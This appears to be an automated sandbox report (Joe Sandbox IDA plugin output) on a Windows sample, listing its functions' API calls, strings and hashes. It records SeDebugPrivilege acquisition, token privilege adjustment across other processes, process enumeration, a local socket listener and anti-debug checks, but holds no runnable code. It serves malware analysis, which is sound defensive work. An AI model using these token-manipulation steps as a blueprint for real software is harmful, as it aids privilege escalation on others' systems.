                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                • String ID: $ $SeDebugPrivilege
                                • API String ID: 2960649016-2587268233
                                • Opcode ID: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                • Instruction ID: aad669a89c621a1efed8306b1901d846cb531ef21f5acb0821ad92d016804d2c
                                • Opcode Fuzzy Hash: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                • Instruction Fuzzy Hash: 86722A72E0010DBBDF04DBA4DD80DEEB7BEAF49354B184066F509E7181EB74EA468B64
                                Function 100018EA Relevance: 48.3, APIs: 24, Strings: 3, Instructions: 1054COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10001772: GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                  • Part of subcall function 10001772: OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                  • Part of subcall function 100017FE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                  • Part of subcall function 100017FE: _memset.LIBCMT ref: 10001836
                                  • Part of subcall function 100017FE: Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                  • Part of subcall function 100017FE: CloseHandle.KERNEL32(00000000), ref: 1000188A
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 1000192D
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001947
                                • CloseHandle.KERNEL32(?), ref: 10001954
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1000198A
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                • CloseHandle.KERNEL32(?), ref: 10001BF8
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001C31
                                • GetLengthSid.ADVAPI32(?), ref: 10001E1D
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10001E30
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                • CloseHandle.KERNEL32(?), ref: 10001E90
                                • GetLengthSid.ADVAPI32(?), ref: 100020B5
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 100020C8
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10002161
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 10001EC9
                                  • Part of subcall function 100018A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100018D8
                                • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                • OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                • CloseHandle.KERNEL32(?), ref: 10002128
                                • GetLengthSid.ADVAPI32(?), ref: 1000234D
                                • SetTokenInformation.ADVAPI32(?,00000019,?,-00000008), ref: 10002360
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Token$Process$Open$AdjustCloseHandlePrivileges$InformationLength$CreateCurrentFirstProcess32SnapshotToolhelp32_memset
                                • String ID: $ $SeDebugPrivilege
                                • API String ID: 2960649016-2587268233
                                • Opcode ID: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                • Instruction ID: 4d650f447e6b2555350515b06da2e3085c12b1ca455cb5b9c8c7034ce516d686
                                • Opcode Fuzzy Hash: 5c8f8f7572a431ea1c747a9f7b4942abedfd1ec40edc22178e5a24254faaafa0
                                • Instruction Fuzzy Hash: B67228B6E0010EBBEB40DBA4DD80DEEB7FEEF48290B514026F505E7145DB34EA468B65
                                Function 004230A0 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 502filethreadCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004230F3
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000A28), ref: 00423108
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                  • Part of subcall function 00405520: std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                  • Part of subcall function 00405520: _memmove.LIBCMT ref: 004055EF
                                  • Part of subcall function 00404C10: std::_Xinvalid_argument.LIBCPMT ref: 00404C2A
                                  • Part of subcall function 00405630: std::_Xinvalid_argument.LIBCPMT ref: 00405696
                                  • Part of subcall function 00405630: std::_Xinvalid_argument.LIBCPMT ref: 004056B4
                                  • Part of subcall function 00405630: _memmove.LIBCMT ref: 00405710
                                • GetCurrentProcess.KERNEL32(00000000,00000001,00000004,00000004), ref: 00423367
                                • SymInitialize.DBGHELP(00000000), ref: 0042336E
                                • SymSetOptions.DBGHELP(00000004), ref: 00423376
                                • CreateFileW.KERNEL32(?,001F01FF,00000003,00000000,00000002,00000000,00000000), ref: 0042339A
                                • GetCurrentThreadId.KERNEL32 ref: 004233A6
                                • GetCurrentProcessId.KERNEL32 ref: 004233D3
                                • GetCurrentProcess.KERNEL32(00000000), ref: 004233DA
                                • MiniDumpWriteDump.DBGHELP(00000000), ref: 004233E1
                                • CloseHandle.KERNEL32(00000000), ref: 004233E8
                                • CreateFileW.KERNEL32(?,001F01FF,00000003,00000000,00000002,00000000,00000000), ref: 0042341C
                                • _memset.LIBCMT ref: 004234EE
                                • GetCurrentThread.KERNEL32 ref: 0042355B
                                • GetCurrentProcess.KERNEL32(00000000,?,Stack:,00000008,?,?,?,?,?,?,?,?,?,00000000,000000FF,?), ref: 00423562
                                • StackWalk.DBGHELP(0000014C,00000000,?,Stack:,00000008,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042356E
                                • GetCurrentThreadId.KERNEL32 ref: 004235EE
                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,Stack:,00000008), ref: 00423640
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,Stack:,00000008), ref: 00423647
                                  • Part of subcall function 004239F0: _vswprintf_s.LIBCMT ref: 00423A01
                                Strings
                                • \, xrefs: 0042324B
                                • Register:EAX = %08X EBX = %08X ECX = %08X EDX = %08X ESI = %08XEDI = %08X CS:EIP = %08X:%08X SS:ESP = %08X:%08X EBP = %08X EFL = %08X, xrefs: 0042349C
                                • Version:%dThreadID:%d%s%s%s, xrefs: 004235F7
                                • 0x%08X [UNKNOWN], xrefs: 0042357B
                                • .dmp, xrefs: 00423354
                                • .txt, xrefs: 0042333E
                                • ExceptionCode: %08X, xrefs: 00423435
                                • Stack:, xrefs: 004234B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Current$Xinvalid_argumentstd::_$FileProcess$Thread$CloseCreateDumpHandleWrite_memmove_memset$InitializeMiniModuleNameOptionsStackWalk_vswprintf_s
                                • String ID: .dmp$.txt$0x%08X [UNKNOWN]$ExceptionCode: %08X$Register:EAX = %08X EBX = %08X ECX = %08X EDX = %08X ESI = %08XEDI = %08X CS:EIP = %08X:%08X SS:ESP = %08X:%08X EBP = %08X EFL = %08X$Stack:$Version:%dThreadID:%d%s%s%s$\
                                • API String ID: 54164247-1109514319
                                • Opcode ID: 59f8e66c929f971016c73f06a144d3e253b3ed5b74d68ad38f8afa825a161306
                                • Instruction ID: bafe23864652bb294b4313159d71bdccdb10557af2fec6effddf2e28871845b8
                                • Opcode Fuzzy Hash: 59f8e66c929f971016c73f06a144d3e253b3ed5b74d68ad38f8afa825a161306
                                • Instruction Fuzzy Hash: 01226DB1E002289BDB24DF64DD89ADAB7B9FF48300F4045EAE509A7241DB786F84CF55
                                Function 00417CF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102networkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000002,?), ref: 00417D86
                                • htons.WS2_32(?), ref: 00417DC0
                                • inet_addr.WS2_32(127.0.0.1), ref: 00417DCE
                                • socket.WS2_32(00000002,00000001,00000000), ref: 00417DE0
                                • bind.WS2_32(?,?,00000010), ref: 00417E08
                                • WSAGetLastError.WS2_32 ref: 00417E1F
                                • WSAAsyncSelect.WS2_32(?,?,000007EA,0000002B), ref: 00417E49
                                • listen.WS2_32(?,00000005), ref: 00417E58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: AsyncErrorLastSelectStartupbindhtonsinet_addrlistensocket
                                • String ID: 127.0.0.1$StartSocket...
                                • API String ID: 3800711040-1162760937
                                • Opcode ID: 90a2da92531660c50f7c2a97172e7af511809c7020e31ab3bc1c4674d8947ae0
                                • Instruction ID: 258e4a67c202dd449cfd1b1360ce0c43d314572bd7a9a82ef3901eb94b91037a
                                • Opcode Fuzzy Hash: 90a2da92531660c50f7c2a97172e7af511809c7020e31ab3bc1c4674d8947ae0
                                • Instruction Fuzzy Hash: 8941D3B0644345ABE7249B70EC4ABE773E5FF18710F004A2DF55A862C1EF78A4448B5A
                                Function 005390CF Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_catch.LIBCMT ref: 005390D6
                                • FindResourceW.KERNEL32(?,?,00000005,00000024,004114B0), ref: 0053910C
                                • LoadResource.KERNEL32(?,00000000), ref: 00539114
                                  • Part of subcall function 0053EC22: UnhookWindowsHookEx.USER32(?), ref: 0053EC52
                                • LockResource.KERNEL32(?,00000024,004114B0), ref: 00539125
                                • GetDesktopWindow.USER32 ref: 00539158
                                • IsWindowEnabled.USER32(?), ref: 00539166
                                • EnableWindow.USER32(?,00000000), ref: 00539175
                                  • Part of subcall function 0053B775: IsWindowEnabled.USER32(?), ref: 0053B77E
                                  • Part of subcall function 0053B790: EnableWindow.USER32(?,00000000), ref: 0053B7A1
                                • EnableWindow.USER32(?,00000001), ref: 0053925A
                                • GetActiveWindow.USER32 ref: 00539265
                                • SetActiveWindow.USER32(?,?,00000024,004114B0), ref: 00539273
                                • FreeResource.KERNEL32(?,?,00000024,004114B0), ref: 0053928F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                • String ID:
                                • API String ID: 964565984-0
                                • Opcode ID: 7124d69081d3e2b64e7d131d5eaaeba151e5185217f078af51354736b2f788d6
                                • Instruction ID: 668ea03494b8bc24eaf7ce0195cf000f674f039c80b556bab3a0e27abac4c7fd
                                • Opcode Fuzzy Hash: 7124d69081d3e2b64e7d131d5eaaeba151e5185217f078af51354736b2f788d6
                                • Instruction Fuzzy Hash: 71516D74A00B06EBDF21AFA5C8496BEBFB2BF84701F140529F542B62A1DBB48D41CB55
                                Function 006388F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0064614E
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00646163
                                • UnhandledExceptionFilter.KERNEL32((s), ref: 0064616E
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0064618A
                                • TerminateProcess.KERNEL32(00000000), ref: 00646191
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID: (s
                                • API String ID: 2579439406-4025125864
                                • Opcode ID: 590569b17a94d60cce8e1711f7611406b4c99bc602f72b8ad344e3ec371f229d
                                • Instruction ID: 72d3c0b1ab5e0624a2c195f8caf202a4eab88d93e3995a920d16c1fd9a1fd053
                                • Opcode Fuzzy Hash: 590569b17a94d60cce8e1711f7611406b4c99bc602f72b8ad344e3ec371f229d
                                • Instruction Fuzzy Hash: 7121FEB4801304DFF700DF25FD887883BA6BB0831AF109119F409832A1F7B96A948F8E
                                Function 026D1776 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 026D178C
                                • OpenProcessToken.ADVAPI32(00000000), ref: 026D1793
                                • LookupPrivilegeValueA.ADVAPI32(00000000,1001A640,?), ref: 026D17AC
                                • CloseHandle.KERNEL32(?), ref: 026D17B9
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 026D17EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3038321057-2896544425
                                • Opcode ID: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                • Instruction ID: 40a8db816648cf123149f473804cff703ba792977cbd66faeed4097837af74b9
                                • Opcode Fuzzy Hash: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                • Instruction Fuzzy Hash: F411ED70E0021DABEF41DFA1CC89BEEBBB8BB08704F104055F605EA290D7B4D6499B60
                                Function 10001772 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                • OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                • LookupPrivilegeValueA.ADVAPI32(00000000,1001A640,?), ref: 100017A8
                                • CloseHandle.KERNEL32(?), ref: 100017B5
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100017E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3038321057-2896544425
                                • Opcode ID: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                • Instruction ID: c108f7e3a1cbaa3bedbfb9ced3ce46b093c37afba01755d79af1fd4902adef89
                                • Opcode Fuzzy Hash: 40261ef32aa84b150c395bfa061fdf74835e87a5e57ea00011e8c88a095eeea1
                                • Instruction Fuzzy Hash: A8112D70A04219ABFB40CFE1CC89BEEBBB8FB08744F114019E601EA180D774EA499B60
                                Function 00658080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000,00000000), ref: 006580BF
                                • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000,00000000), ref: 006580E8
                                • GetACP.KERNEL32(?,?,006586BD,?,0064E425,?,000000BC,?,00000001,00000000), ref: 006580FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: 0ab6d37895909ae40350038d44c2fae9a675c6e6193aeeb000ac7a1079539c95
                                • Instruction ID: 3294278cb8db95d67fdc967bfad10ee34ed01861aba8af19052e29f188eed78f
                                • Opcode Fuzzy Hash: 0ab6d37895909ae40350038d44c2fae9a675c6e6193aeeb000ac7a1079539c95
                                • Instruction Fuzzy Hash: 2201D43060521BBEEB219B54EC05F9A77ABAB0075AF140119F901F39C0EFA0CA899358
                                Function 00428B10 Relevance: 7.7, APIs: 5, Instructions: 196processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428B4E
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00428B6D
                                • Process32NextW.KERNEL32(?,0000022C), ref: 00428CDC
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000001), ref: 00428CF1
                                • CloseHandle.KERNEL32(?,80004005,80070057,?,?,?,?,00000001), ref: 00428D59
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 1789362936-0
                                • Opcode ID: 995ed7f47f2d1cc03e10d24073f02005f373c432020d6df61f39b8e01364367c
                                • Instruction ID: 25a12b0859ee96136ed525bf436629f29b4ffa2cae606a54a48bf79648aa9e36
                                • Opcode Fuzzy Hash: 995ed7f47f2d1cc03e10d24073f02005f373c432020d6df61f39b8e01364367c
                                • Instruction Fuzzy Hash: 8571C0316026259FD710DF28DC88BAEB3B5FF54320F50869DE529AB2D0DB34AE45CB94
                                Function 026DAD45 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 026DCE19
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 026DCE2E
                                • UnhandledExceptionFilter.KERNEL32(10018614), ref: 026DCE39
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 026DCE55
                                • TerminateProcess.KERNEL32(00000000), ref: 026DCE5C
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                • Instruction ID: f4861ad3ad0361cfb629bfb88e9e78593668e5f37c53751b948466af0125ac0d
                                • Opcode Fuzzy Hash: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                • Instruction Fuzzy Hash: B421CFB8805368EFF710DF68C8C46947BAABB28714F60411AF50887AA0E7705687CF49
                                Function 1000AD41 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 1000CE15
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000CE2A
                                • UnhandledExceptionFilter.KERNEL32(10018614), ref: 1000CE35
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 1000CE51
                                • TerminateProcess.KERNEL32(00000000), ref: 1000CE58
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                • Instruction ID: db866b1daaedd4f763d18a4d884832a689f87af637e38a2f1d611465a9a4395e
                                • Opcode Fuzzy Hash: a883567adb10ffdb079e78de1a47da8583862bbadaa125666869bc87a981ee0c
                                • Instruction Fuzzy Hash: C921BEBC8043A8EBF741DF24C8C46847BAAFB28755F60412AF40887AA1E7709787CF15
                                Function 0066F472 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • ____lc_handle_func.LIBCMT ref: 0066F48C
                                  • Part of subcall function 006392A3: __getptd.LIBCMT ref: 006392A3
                                • GetLocaleInfoW.KERNEL32(?,00000022,0066C2F1,00000002,?,?,?,0066C2F1,?,?,?,0000003F,006FCEF4,00000000), ref: 0066F494
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: InfoLocale____lc_handle_func__getptd
                                • String ID: 2
                                • API String ID: 4216669283-450215437
                                • Opcode ID: d0ebc289571ca25990eeb6bc16180c8721a08dab3e40848e5c1ee51a5684789d
                                • Instruction ID: 052237959bd79512a00b67ffc9a1d0751408f652643aa98fe32952456ea8a607
                                • Opcode Fuzzy Hash: d0ebc289571ca25990eeb6bc16180c8721a08dab3e40848e5c1ee51a5684789d
                                • Instruction Fuzzy Hash: 4FF0A726911208BEDB12DB90E90BADF73F5EB40758F108494D001E7082EBF4DF84D391
                                Function 0040F550 Relevance: 4.9, APIs: 3, Instructions: 423COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __aulldiv$__aulldvrm
                                • String ID:
                                • API String ID: 4119620657-0
                                • Opcode ID: 4eb5ab245642622a0a25c22dc2cf0a800fe594b8a308f5ec97504688320260da
                                • Instruction ID: 43c0f0c7caa4d485aa74365e723faa3c18075ca83ccd471006530c658ff28231
                                • Opcode Fuzzy Hash: 4eb5ab245642622a0a25c22dc2cf0a800fe594b8a308f5ec97504688320260da
